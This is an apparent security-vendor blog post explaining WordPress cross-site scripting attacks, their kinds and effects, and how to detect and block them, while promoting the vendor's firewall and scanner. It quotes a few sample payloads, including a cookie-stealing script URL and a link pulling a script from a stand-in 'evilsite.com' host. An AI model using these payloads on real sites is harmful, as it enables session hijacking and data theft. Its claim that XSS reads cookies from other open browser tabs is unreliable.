WordPress XSS Attacks: How to prevent them

Let’s just start by saying that, if you are worried about WordPress XSS, you are not being paranoid but prudent. The cross-site scripting vulnerability is not restricted to WordPress websites only, but affects it equally nonetheless. The best defence is to install a firewall, and to keep your themes and plugins updated. 

In this article, we are going to break down what the vulnerability is exactly—and bear with us, it is going to get technical—so you can make informed decisions about your website security. We’ve got a complete guide on how to prevent attacks that we recommend you check out as well.  

TL;DR: If you suspect that your WordPress site has been hacked, we advise that you install MalCare to remove the malware from your site immediately.

What is WordPress XSS?

WordPress XSS is a malware attack that is carried out by exploiting a cross-site scripting vulnerability on the WordPress website. It is the most common way that WordPress websites get hacked, especially since there are legions of plugins that have XSS vulnerabilities

So what is cross-site scripting? 

Cross-site scripting or XSS is a vulnerability that allows unauthorized JavaScript code to be executed on a website. In fact, it is the most common website vulnerability, and it is super difficult to catch because attacks exploiting this vulnerability can be of many types. This is especially true of large and complex websites. 

There are many types of attacks, but they can be clubbed into two categories for clarity: 

  • The malicious script is executed on the client-side in the browser;
  • Or, one where the malicious scripts are stored and executed on the server, and then served by the browser;

And in either case, the hacker can use an XSS attack to steal data or manipulate how the site looks and behaves.

This is the simplified version of cross-site scripting. You can find a more detailed explanation at the end of this article. 

Why are XSS attacks so common?

WordPress plugins can be extremely complex. Sometimes even more complex than WordPress itself. With greater complexity, the possibility of security issues only increases. XSS attacks are particularly difficult to protect against making the job of the plugin author even more difficult.

Even some of the best web companies with dedicated security teams such as Google, Apple, Facebook and more have suffered from such attacks. It will help put things in perspective as to how it may creep into a WordPress plugin with much fewer resources.

Is my website vulnerable to an XSS attack?

If you have a firewall and keep everything updated, the possibility is significantly lower. But remember there is no foolproof protection against such attacks. There may be a non-public vulnerability that may be exploited by a hacker. Hence as a safety measure scan your website regularly.

While the damage caused by such vulnerabilities depends on the exact details of the issue, in the worst case, the entire site can be taken over by hackers. In some cases, the hackers may be able to make a minor change to the site, to even redirect your site to their own malicious site.

In other words, hackers can use your browser to:

  • Hijack a user’s session by sniffing out the Session ID
  • Place unauthorized pop ups and redirects
  • Launch phishing attacks
  • Install keyloggers that make note of every keystroke by the victim
  • Steal financial information

There’s only one way to defend against such attacks. Install MalCare’s firewall right away.

Are all XSS attacks equally dangerous?

No. Some XSS attacks are a lot more dangerous as they can give the hacker complete access to your site. Hackers can then do anything they want with the site.

Others let the hackers modify only a small portion of the site. This too can be very dangerous with malware being served to your visitors and more.

Some XSS attacks may need the hacker to already be a contributor to your site. In this case, the danger posed is much lower.

How do hackers exploit such vulnerabilities?

Most hackers use automation to find vulnerabilities. After that, it’s just a matter of executing the hack. In certain cases, the entire attack can be done by a bot.

We told you upfront that there are 5 basic ways in which a hacker can use cross-site scripting in a practical way. Let’s walk you through all those variants one by one.

#1 Hijacking the user’s session

We’ve already talked a little bit about how an XSS attack can gain access to a cookie. Now, the most dangerous part about being able to fetch a cookie is that the same hack can reveal a user’s session ID.

Most websites use sessions as a unique identifier for each user. These sessions are stored in session cookies. Using a simple script like this one:

http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<script>new  Image().src=””+document.cookie;</script>

A hacker can send the session cookie to the site and this request gets logged in the access.log file on the server.

Now, using this session information, the hacker can easily log into any account you logged into without ever needing a password.

#2 Perform unauthorized activities

There are certain instances where the hacker can’t use Javascript to steal the cookie. In this case, they try to use XSS attacks to perform unauthorized activities. For instance, a message that pops up in the comments of your blog post that keeps getting posted.

This sort of attack can take the shape of site defacement or a malicious script that keeps spreading to more and more users.

#3 Phishing attacks

In many situations, a WordPress XSS attack is only the starting place for a much larger scheme. There are cross-site scripts that lead to phishing attacks on your site as well. In most cases, the malicious script starts pushing phishing scams on your site that will fool your users into giving up their sensitive information.

We have an entire article on phishing attacks, so give that a read if you’d like to know more.

#4 Installing keyloggers

In this attack scenario, the hacker implements a script that installs a keylogger on a vulnerable site. Every time a user types in something, the keylogger will store it and send it back to the hacker. This is a dangerous attack and can steal passwords and credit card info in a snap.

The JavaScript file contains the following code:

Installing keyloggers through WordPress XSS Attack
Image credit: PentestTools

In this code, you’ll see that the Javascript opens a file called ‘keylog.php’. The code in that file saves all the keys pressed by a user’s keyboard into a file called data.txt.

Installing keyloggers through XSS Attacks
Image credit: PentestTools

Using this technique, a hacker can easily read exactly what you’re typing on an infected site.

#5 Stealing Sensitive Information

We’ve already talked quite a bit about cookies and how they can be stolen. This type of attack simply takes the same principle even further.

Imagine that your bank’s internet banking page is vulnerable to XSS attacks. Using the right script, the hacker could directly log into your bank account without any validation at all!

Again, this is not a new concept. It’s just an extension of what a hacker can do with session cookies.

How to protect from XSS attacks?

Firewalls are your best defence in the face of a constantly evolving threat. 

Firewalls have special rules which look for requests that can contain suspicious text typically found in XSS attacks. The problem is that hackers keep coming up with smarter variations of this malicious text which can bypass some of the smartest firewalls. 

This is not the best solution at all times, though. It’s a cat and mouse game and can often fetch some false positives.

We have an article on how to secure a WordPress site you should definitely check out. 

How to detect a WordPress XSS attack on your site

The simplest way to detect an XSS attack on your site is to install a security plugin like MalCare. MalCare has an automated malware scanner that scans your entire site every day. With a top-of-the-line machine learning algorithm, the malware scanner detects malicious scripts anywhere on your site. 

MalCare even finds unknown malware and gives you an ‘Autoclean’ option.

Detecting XSS Vulnerability through MalCare Scanner

Of course, the sensible thing to do is to never let a hack like happen in the first place. But XSS attacks are incredibly tricky to protect against. The best you can do is to harden your WordPress security. 

You can also make the most of MalCare’s Advanced Firewall. MalCare’s firewall automatically prevents suspicious or malicious IP addresses from connecting to your site. 

The best part? Every time a hacker’s IP is discovered on any of the 250,000+ sites that MalCare protects, that IP address gets banned across every site under MalCare’s protection.

If your team members ip address or website admin is accidentally blocked from accessing the site, don’t worry! check out our guide on how to whitelist an ip address.

How does XSS work?

Depending on what kind of attack the hacker launches, there are different types of cross-site scripting. They all have one thing in common — they all use Javascript to spread malware.

Javascript is a language that sits between the HTML code for web pages. Now, Javascript is capable of creating variables that perform extremely powerful calculations. As such, you can use it to do almost anything you can imagine.

For instance, let’s say that you have a WooCommerce website that accepts payment details and stores them in the WordPress database. You can use Javascript to send the credit card details and login data to someone else!

So, when a hacker exploits a vulnerability in your site’s code to execute Javascript, that’s an XSS attack. Typically, this type of vulnerability occurs anywhere on your site where a user can input data. This includes popups, forms, search bars, even your URLs.

Now, this data input field doesn’t have to be a visual field. It can even be a faulty variable in your site’s code that fetches unsanitized data from any file or database.

The WordPress core was also vulnerable to XSS attacks. Initially, all a hacker would need to do to execute XSS was to create a PHP file that had the following lines of code in it:

/* Template Name: <script>confirm(document.cookie);</script> */

XSS in theme

Let’s break that down.

That piece of code is just a comment that declares the file’s name. On its own, it’s benign and gets ignored by WordPress.

But inside the comment, you’ll notice that after ‘Template Name:’ there is a piece of code that starts with ‘<script>’ and ends with ‘</script>’. This is a Javascript code that’s trying to fetch the cookie and display a confirmation box in your browser.

XSS attack popups

This is an example of a WordPress XSS attack.

An older version of WordPress would have executed this immediately as the template name would be fetched by the WordPress Theme Editor as is. The Theme Editor fetched the template name using a ‘$file_description’ function that didn’t have any countermeasures against XSS attacks.

Of course, the script in the above example isn’t that powerful or malicious. But the point remains the same. If benign code can be executed in any input field, malicious code can as well!

This particular hack was patched in WordPress version 4.8.2 but the same vulnerability exists in many WordPress themes and plugins.

In fact, this is a major problem with many WordPress plugins. The fact is that most plugins can be exceedingly complex. Some are even more complex than WordPress core files. This degree of complexity can often result in security issues.

And that’s how WordPress XSS works. If you’re running an older version of WordPress, we highly recommend that you update immediately. 

Also, here’s a list of WordPress plugins that are known to have XSS vulnerabilities. We highly recommend that you avoid them as far as possible. If you’re using one of these plugins, find out if they have an update that patched the vulnerability and updates to the latest version.

Types of Cross-Site Scripting

There are primarily two types of XSS Attacks that you need to learn about:

  • Stored Or Persistent XSS Attack – The target of this attack is the visitor to your website. They defraud customers, steal their private information and their funds.
  • Reflective Or Non-Persistent XSS Attack – The target is your WordPress website.

We’ll explain both attacks in detail.

Stored Or Persistent XSS Attack

Let’s assume your website is a blog that allows people to comment on articles you publish. When a visitor leaves a comment, the data is sent to the database and stored.

Your site should have configurations to sanitize the data before it’s sent to the database. This means it should check whether what the user entered is a regular comment or if it’s a malicious script. If these checks aren’t in place, it opens up a WordPress XSS flaw. Let’s see how:

Step 1: Hacker Finds The Vulnerability And Exploits It

Hackers use automated scanners to run through the internet and find websites that have an XSS vulnerability. Once they find your site, they enter malicious scripts into your comments section. Since your website has no checks in place, it accepts the script and sends it to the database.

Step 2: A Visitor Views The Infected Page

To a visitor, the hacker’s input would look like a regular comment. What the visitor and the website owner don’t know is that this comment is an executable code that is designed to steal cookies. Anyone who simply visits this page will be impacted.

Step 3: The Hacker Steals Browser Cookies

We know regular users usually have multiple tabs open on a browser such as email, Facebook, a shopping site like Amazon, a work website, YouTube, etc. 

chrome xss

When they visit your website and view the page with the hacker’s comment, the code is executed. This enables the hacker to steal their browser cookies. This attack is called ‘cross-site’ because they are able to steal cookies of all sites open on different tabs.

Step 4: The Hacker Exploits The Stolen Cookies

Next, using these cookies, hackers can pose as authenticated users on the shopping site and make purchases. The attackers can steal sensitive account information such as usernames and passwords. They can also hack into your email and send phishing or defrauding mails to your contacts. The list is endless.

This kind of attack jeopardizes anyone who visits your website. In the next type of XSS attack, it targets the website directly.

Reflective Or Non-Persistent XSS Attack

In the previous attack, we saw how hackers target visitors. But in this attack, hackers infect the website itself. As we mentioned earlier, most internet users have multiple tabs open on their browsers. 

The same applies to website owners as well. 

Many times, your WordPress admin user dashboard is just one of the tabs open on your browser. This makes a reflective XSS attack possible.

We’ll illustrate how this happens:

Step 1: Getting the Site Owner to Click on a Malicious Link

Quite often, hackers send malicious links through emails hoping someone falls for their trick. In other cases, hackers place these malicious links on other WordPress sites.

When you click on the link, it causes a script to load on your website from an external website. This link contains a code like this:

https://yoursite.com/test.php?val=<script src=”http://evilsite.com/badscript.js”></script>

Step 2: Grab Session Cookies

By clicking on the link, you execute the code. This enables hackers to steal your cookies and pose as a user signed into your administrator account of your WordPress site. Once they gain access to your site, they could steal login credentials and sensitive data, lock you out of your own website, and use it to run different kinds of hacks.

XSS attacks carry severe consequences and damage to your website and business. Recovering from such an attack consumes a lot of time and money. You can avoid being a victim of XSS by taking precautions against it.

What’s next?

The next step is always to set up protection against future attacks. There’s no nice way to say this, but there’s no foolproof way to protect your site against cybercrime. The best we can suggest for now is to have a process around routine WordPress security audits.

We have an entire article on how to prevent WordPress XSS attacks. So, we recommend that you head over to that article and give that a read if your site is being attacked right now. 

You can also install MalCare right now. It automates most of the dirty work you’ll need to improve your site security.


What is XSS?

Cross-site scripting or XSS is a common security vulnerability found in web applications. The vulnerability allows a hacker to execute malicious code in your browser. Any cyberattack that uses an XSS vulnerability is known as an XSS attack.

What is an XSS attack example?

XSS attacks are extremely popular and quite vicious. Naturally, they have been used against some of the biggest companies in the world including Facebook, YouTube, and Google to steal passwords and personal information.

What does cross-site scripting mean?

Cross-site scripting (XSS) is a cyberattack that uses malicious scripts on your web browser to hack browser session cookies to steal highly sensitive data. Used effectively, cross-site scripting can steal passwords and financial information. WordPress XSS attacks are very difficult to defend against unless you use a powerful firewall to block malicious IP addresses of country or device.

Why is XSS dangerous?

Cross-site scripting is extremely dangerous. Depending on the bot used to find a vulnerability and the hacker’s coding capabilities, the attacker can steal any kind of sensitive information. It’s also very difficult to defend against because there’s no general template to XSS and it’s very hard to detect.

How to protect your site from XSS attacks?

The simplest way to defend against XSS attacks is to install a firewall that can effectively block out malicious traffic. For WordPress, we also recommend hardening your website against typical hacks.


Nirvana is a WordPress enthusiast, and enjoys sharing their experience with fellow enthusiasts. On the MalCare blog, Nirvana distils the wisdom gained from building plugins to solve security issues that admins face.

Copy link
Powered by Social Snap